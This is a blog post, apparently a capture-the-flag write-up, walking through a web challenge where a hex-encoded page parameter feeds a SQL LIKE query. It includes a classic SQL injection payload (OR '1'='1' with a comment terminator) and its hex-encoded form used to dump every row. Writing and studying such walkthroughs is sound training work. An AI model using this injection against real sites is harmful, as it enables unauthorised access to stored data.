Published 2024-10-21 by Daniel Bark

Capture the flag - A Great Hobby for Developers

As developers, we’re constantly looking for ways to sharpen our skills and keep learning.

In my opinion, one of the most engaging and rewarding ways to do this is through Capture the Flag (CTF) competitions.

These events, which are designed to test problem-solving and security skills, offer a unique opportunity for developers to explore new techniques, tools, and approaches in a hands-on way.

I would like to showcase this by walking you through how I solved a really fun challenge recently.

The Task - “Target List”

In the short brief I was instructed:“See if you can find any hidden targets in the target list”.

We land on a site with three links: A, B and C.

If we click on A we land on the same url but a query parameter of “page=1” was added.

The page displayed <h1>Page 01</h1> and <p>Targets starting with "A"</p>.

There is a table on the page listing 2 results: Alice and Amber.

There are no surprises on page B or C:

So intuitively I wanted to first look through the whole alphabet to see if there are more data accessible other than the 3 linked pages of A,B and C.

I edit to URL to page=4.

Things get weird

We continue looking throught empty pages until we reach page 10. I was expecting to see targets starting with the letter “J” but things get a bit more confusing.

Hmm…What’s going on here?

I was stuck for quite a while figuring out how the page, Page and the Target string related to each other.

Lets test some larger page numbers:

Hmm by this pattern it seems like the Page value is parsed in pairs of 2? What if the second character pair of page is 10? will that give us the 10th letter in the alphabet “J”?

Ok it seems like 10 = “P” which is the 16th letter of the alphabet. Or the Hex’th. You get where im going?

Going Hexadecimal

It appears as tho the Page string is parsed in pairs as Hexadecimal Bytes. 256 possible values starting from 00 to ff.

Finally things make sense again but there is a second problem. Page always starts with a “0”.

This limits us in what first character we can produce:

Because of this we can only produce strings starting with ”@” or “A” through “O”.

The Challenge

Now the challenge was quite clear, the hidden targets had a starting character outside of this range.

We just need to produce a malicous string that tricks the system.

A resanoble guess is that my input gets baked into a SQL query in some way.

A sql query like this could produce the results we are seeing.

SELECT * FROM targets WHERE
name LIKE '[user_provided_query]%'

For the characters apart from the first one we have the full range of 256 characters we can produce.

Lets see how the system responds to string terminator characters like ' and ".

Turned out that if you pass a " the system fails in some way.

That is great news!

If we can break out of the string we can potentially inject SQL into the system.

If we were to inject A" OR '1'='1'; -- we could potentiallt result in

SELECT * FROM targets WHERE
name LIKE 'A%' OR '1'='1'; -- %';

The OR '1'='1' syntax is logically equivalent to OR true which would match all targets in the database.

The -- is used to comment out the rest of the query to avoid SQL syntax errors.

To wrote a quick script so that I could input my desired SQL injection string and my script spit out this abomination: page=1016562600F12606771677D6771677B606D6D60

And amazingly the page responds with all targets in the Database 🎉

After a wild 4 hour ride the flag presented itself on a user with the name zflag.

The journey described here is why I think CTF’s can be a great learning tool.

I enjoy the mix of problem solving, thinking outside the box and having to do lots of tools and technology research.

Try it out if you haven’t and see of you can muster the patience and resiliance to experience the sweet relief of the flag.

Have a great day and good luck on your next CTF.

Written by Daniel Bark